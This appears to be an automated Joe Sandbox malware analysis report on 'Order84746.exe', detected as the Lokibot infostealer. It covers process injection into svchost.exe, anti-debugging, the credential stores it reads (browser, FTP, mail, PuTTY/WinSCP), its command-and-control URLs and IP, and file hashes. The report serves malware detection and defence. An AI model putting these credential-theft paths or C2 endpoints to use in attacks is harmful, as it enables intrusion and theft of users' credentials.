              Source: C:\Users\user\Desktop\Order84746.exeAPI coverage: 4.5 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 2816Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 2816Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00926CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00926CA9
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009260DD
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009263F9
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092EB60
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092F5FA
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092F56F FindFirstFileW,FindClose,0_2_0092F56F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00931B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931B2F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00931C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931C8A
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00931F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00931F94
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008FDDC0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
              Source: svchost.exe, 00000001.00000002.2659236687.0000000003600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041289A LdrInitializeThunk,1_2_0041289A
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00936AAF BlockInput,0_2_00936AAF
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008E3D19
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00913920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00913920
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009E5F50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_009E5F50
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_011DC138 mov eax, dword ptr fs:[00000030h]0_2_011DC138
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_011DC0D8 mov eax, dword ptr fs:[00000030h]0_2_011DC0D8
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_011DAAA8 mov eax, dword ptr fs:[00000030h]0_2_011DAAA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h]1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h]1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h]1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h]1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4410 mov eax, dword ptr fs:[00000030h]1_2_00FA4410
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4410 mov eax, dword ptr fs:[00000030h]1_2_00FA4410
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3540 mov eax, dword ptr fs:[00000030h]1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3540 mov eax, dword ptr fs:[00000030h]1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3540 mov eax, dword ptr fs:[00000030h]1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA56A0 mov eax, dword ptr fs:[00000030h]1_2_00FA56A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA56A0 mov ecx, dword ptr fs:[00000030h]1_2_00FA56A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0091A66C
              Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00908189 SetUnhandledExceptionFilter,0_2_00908189
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009081AC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA5848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00FA5848
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,1_2_00FA33C0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.156.177.41 80Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\Order84746.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\Order84746.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31CF008Jump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091B106 LogonUserW,0_2_0091B106
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008E3D19
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092411C SendInput,keybd_event,0_2_0092411C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009274BB mouse_event,0_2_009274BB
              Source: C:\Users\user\Desktop\Order84746.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order84746.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0091A66C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009271FA
              Source: Order84746.exeBinary or memory string: Shell_TrayWnd
              Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009065C4 cpuid 0_2_009065C4
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0093091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0093091D
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0095B340 GetUserNameW,0_2_0095B340
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00911E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00911E8E
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008FDDC0
              Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000001.00000002.2659257287.0000000003621000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\svchost.exeCode function: PopPassword1_2_0040D069
              Source: C:\Windows\SysWOW64\svchost.exeCode function: SmtpPassword1_2_0040D069
              Source: Order84746.exeBinary or memory string: WIN_81
              Source: Order84746.exeBinary or memory string: WIN_XP
              Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
              Source: Order84746.exeBinary or memory string: WIN_XPe
              Source: Order84746.exeBinary or memory string: WIN_VISTA
              Source: Order84746.exeBinary or memory string: WIN_7
              Source: Order84746.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00938C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00938C4F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0093923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0093923B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA6AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00FA6AF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA6BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00FA6BB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA6B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00FA6B60

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		2
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Service Execution              		2
              Valid Accounts              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol2
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt3
              Windows Service              		2
              Valid Accounts              		21
              Obfuscated Files or Information              		2
              Credentials in Registry              		1
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation              		11
              Software Packing              		NTDS117
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		112
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script3
              Windows Service              		1
              DLL Side-Loading              		LSA Secrets241
              Security Software Discovery              		SSH3
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
              Process Injection              		1
              Masquerading              		Cached Domain Credentials21
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Valid Accounts              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Virtualization/Sandbox Evasion              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Order84746.exe26%ReversingLabsWin32.Trojan.AutoitInject
              Order84746.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://94.156.177.41/davinci/five/fre.php100%Avira URL Cloudphishing
              0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://94.156.177.41/davinci/five/fre.phptrue
              • Avira URL Cloud: phishing
              		unknown
              true
              • Avira URL Cloud: safe
              		unknown
              http://kbfvzoboss.bid/alien/fre.phpfalse
                		high
                http://alphastand.win/alien/fre.phpfalse
                  		high
                  http://alphastand.trade/alien/fre.phpfalse
                    		high
                    http://alphastand.top/alien/fre.phpfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.ibsensoftware.com/svchost.exe, svchost.exe, 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        94.156.177.41
                        		unknownBulgaria
                        		43561NET1-ASBGtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1565036
                        Start date and time:2024-11-29 07:36:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Order84746.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/4@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 54
                        • Number of non-executed functions: 300
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: Order84746.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        01:37:04API Interceptor32x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        94.156.177.41FVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 94.156.177.41/soja/five/fre.php
                        Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 94.156.177.41/simple/five/fre.php
                        file.exeGet hashmaliciousLokibotBrowse
                        • 94.156.177.41/maxzi/five/fre.php
                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                        • 94.156.177.41/simple/five/fre.php
                        stthigns.docGet hashmaliciousLokibotBrowse
                        • 94.156.177.41/maxzi/five/fre.php
                        goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                        • 94.156.177.41/maxzi/five/fre.php
                        PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                        • 94.156.177.41/maxzi/five/fre.php
                        ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                        • 94.156.177.41/simple/five/fre.php
                        greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                        • 94.156.177.41/simple/five/fre.php
                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                        • 94.156.177.41/simple/five/fre.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        NET1-ASBGFVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 94.156.177.41
                        Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                        • 94.156.177.41
                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                        • 93.123.76.46
                        efN78UF3Si.exeGet hashmaliciousDarkTortilla, SmokeLoaderBrowse
                        • 94.156.177.166
                        file.exeGet hashmaliciousLokibotBrowse
                        • 94.156.177.41
                        filepdf.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                        • 94.156.177.166
                        putty .exeGet hashmaliciousDarkTortilla, SmokeLoaderBrowse
                        • 94.156.177.166
                        2.ps1Get hashmaliciousUnknownBrowse
                        • 94.156.177.166
                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                        • 94.156.177.41
                        stthigns.docGet hashmaliciousLokibotBrowse
                        • 94.156.177.41

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\aut3820.tmp

                        Download File
                        Process:C:\Users\user\Desktop\Order84746.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):81882
                        Entropy (8bit):7.960253809061817
                        Encrypted:false
                        SSDEEP:1536:N84RYAocnUiqy86Kld/SRUgG9NlX4THYCjXcwSl2w:N8grocn46G0RUbNlX41I
                        MD5:A26C9E7CD8282CE3598085EFE6E3A638
                        SHA1:23EBD2444EBD5758FF146C4BB15E13B2A584F270
                        SHA-256:106D03A3E65BB59261A0ACE79FF7DA102374EBEA83154736A7F17278135B416D
                        SHA-512:1A0FF06FF9523AD8D7B62F8C82AF89EBA33394D00976AEDC45EF10D0539455A3BB93583431FD67F234E6200D67E2B2E9D3883405830D54BA6CCD814C38E36425
                        Malicious:false
                        Reputation:low
                        Preview:EA06.....B..z...B..g.Ng*.H..j..R.C.P@.I..H.....#..@.I.#.I..(......^-.....8...... ....y.N.2.Mh..t.uc..bW...P..iS...&r.Yg7{..z.?........o.u...a.(.........W......^.....{.~..i...:..&s...y~...=..g..>o.P..Zn;O~......./;;F..g.._+.O.].=..P..:-g{\..35...h.).bg5..h.....f..'5I......@.....Q..&3Z.6.0....*...-..B..........y......4..,U.P....*...O..G...Q.0../.;A.L&`.&..B....iW.P..>..".Q.O&sY...A....H8...."/. ._./T...Y.2j."[#3..;.U.....D.d...Fg.O.n^.#...32.L..F..U...D?.P.......Z..w.....*U_.....>......Q.Z.4..........m..N.>.@.!..P{\..:{.."..S...O*8.......m..."}J..@...N.z....._...e..[U".1.L....A..U!.Z.".L.}...&..Y..'sZ.....U..=..Y.U&t....Tej.;...Y..U....Zhp:..I0.J@3.,.s..(t0..H.w..f.W.P.t..ck..J....#..Q.t-..K..I@...F.S..0..,.3......x.D.O.....u-."(..%Z....5....v..:|.]B.C..(.>..cW.s...?.....k.....D.....Uh.@.D..NMnkP.j$5.G...Dn...e.c..DT..su......=<.T.P+..W.{V....JWr.g.....^.}|....-.?.....n...D..4.lf.c.........M?.@<.wN..tj.gc..L.}....r........U...Mj...e.r..+/....3..c

                        C:\Users\user\AppData\Local\Temp\sulfhydric

                        Download File
                        Process:C:\Users\user\Desktop\Order84746.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):7.456255383661251
                        Encrypted:false
                        SSDEEP:3072:kXOQ+ieppoWfjE94UAhh/gjijSP90VzVIao:kUiecmw94TcmSPeV+H
                        MD5:9BC6AF9C2EB2F14D11504D025EF3D893
                        SHA1:4B3869C8783256E06A6254AB5EC84FD4B337C437
                        SHA-256:9E76A9F7F77EB205E9818AAC8AEF21484337B7CFBF8F98100D7CD9574DC7968F
                        SHA-512:E290AE6AF8C10D48271BDF2502FD3E2E805DDD32CE5DA89DEC2934607EA395CB261416A54AFF98184E7B029BC9E4A16C067446735BAC4CE49E3FA1153356640D
                        Malicious:false
                        Reputation:low
